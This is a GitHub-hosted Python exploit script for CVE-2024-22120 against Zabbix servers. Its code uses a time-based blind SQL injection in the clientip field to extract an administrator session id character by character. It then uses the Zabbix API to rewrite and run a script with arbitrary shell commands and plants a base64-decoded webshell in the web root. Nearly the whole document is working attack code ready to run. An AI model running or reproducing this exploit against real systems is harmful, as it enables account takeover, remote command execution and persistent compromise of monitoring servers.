-
Notifications
You must be signed in to change notification settings - Fork 22
/
Copy pathCVE-2024-22120-Webshell.py
123 lines (116 loc) · 4.8 KB
/
CVE-2024-22120-Webshell.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
import json
import argparse
import requests
from pwn import *
from datetime import datetime
def SendMessage(ip, port, sid, hostid, injection):
context.log_level = "CRITICAL"
zbx_header = "ZBXD\x01".encode()
message = {
"request": "command",
"sid": sid,
"scriptid": "1",
"clientip": "' + " + injection + "+ '",
"hostid": hostid
}
message_json = json.dumps(message)
message_length = struct.pack('<q', len(message_json))
message = zbx_header + message_length + message_json.encode()
r = remote(ip, port, level="CRITICAL")
r.send(message)
r.recv(1024)
r.close()
def ExtractAdminSessionId(ip, port, sid, hostid, time_false, time_true):
session_id = ""
token_length = 32
for i in range(1, token_length+1):
for c in string.digits + "abcdef":
before_query = datetime.now().timestamp()
query = "(select CASE WHEN (ascii(substr((select sessionid from sessions where userid=1 limit 1),%d,1))=%d) THEN sleep(%d) ELSE sleep(%d) END)" % (i, ord(c), time_true, time_false)
SendMessage(ip, port, sid, hostid, query)
after_query = datetime.now().timestamp()
if time_true > (after_query-before_query) > time_false:
continue
else:
session_id += c
print("(+) session_id=%s" % session_id, flush=True)
break
return session_id
def ExecuteCommand(url, auth, cmd, hostid):
headers = {
"content-type": "application/json",
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36"
}
payload = {
"jsonrpc": "2.0",
"method": "script.update",
"params": {
"scriptid": "2",
"command": "" + cmd + ""
},
"auth": auth['result'],
"id": 0,
}
requests.post(url, data=json.dumps(payload), headers=headers)
payload = {
"jsonrpc": "2.0",
"method": "script.execute",
"params": {
"scriptid": "2",
"hostid": "" + hostid + ""
},
"auth": auth['result'],
"id": 0,
}
cmd_exe = requests.post(url, data=json.dumps(payload), headers=headers)
cmd_exe_json = cmd_exe.json()
if "error" not in cmd_exe.text:
return cmd_exe_json["result"]["value"]
else:
return cmd_exe_json["error"]["data"]
def CheckWebshell(url):
headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36"
}
resp = requests.get(url, headers=headers, timeout=10)
if resp.status_code == 200:
return True
else:
return False
def EchoWebshell(ip, hostid, sessionid, shell_content, shell_name):
cmd = f"echo '{shell_content}' | base64 -d > /usr/share/zabbix/{shell_name}"
url = f"http://{ip}/api_jsonrpc.php"
shell_url = f"http://{ip}/{shell_name}"
auth = json.loads('{"jsonrpc": "2.0", "result": "' + sessionid + '", "id": 0}')
print(ExecuteCommand(url, auth, cmd, hostid))
if CheckWebshell(shell_url):
print(f"webshell url: {shell_url}")
else:
print("error in write webshell")
if __name__ == "__main__":
parser = argparse.ArgumentParser(description="CVE-2024-22120-Webshell")
parser.add_argument("--false_time",
help="Time to sleep in case of wrong guess(make it smaller than true time, default=1)",
default="1")
parser.add_argument("--true_time",
help="Time to sleep in case of right guess(make it bigger than false time, default=10)",
default="10")
parser.add_argument("--ip", help="Zabbix server IP", required=True)
parser.add_argument("--port", help="Zabbix server port(default=10051)", default="10051")
parser.add_argument("--sid", help="Session ID of low privileged user")
parser.add_argument("--aid", help="Session ID of Administrator privileged user")
parser.add_argument("--hostid", help="hostid of any host accessible to user with defined sid", required=True)
parser.add_argument("--file", help="shell file path, eg:shell.php", required=True)
args = parser.parse_args()
if not args.aid:
if not args.sid:
print("need --sid")
sys.exit(0)
admin_sessionid = ExtractAdminSessionId(args.ip, int(args.port), args.sid, args.hostid, int(args.false_time),
int(args.true_time))
else:
admin_sessionid = args.aid
with open(args.file, "r", encoding="utf-8") as f:
shell_content = base64.b64encode(f.read().encode("utf-8")).decode("utf-8")
f.close()
EchoWebshell(args.ip, args.hostid, admin_sessionid, shell_content, os.path.basename(args.file))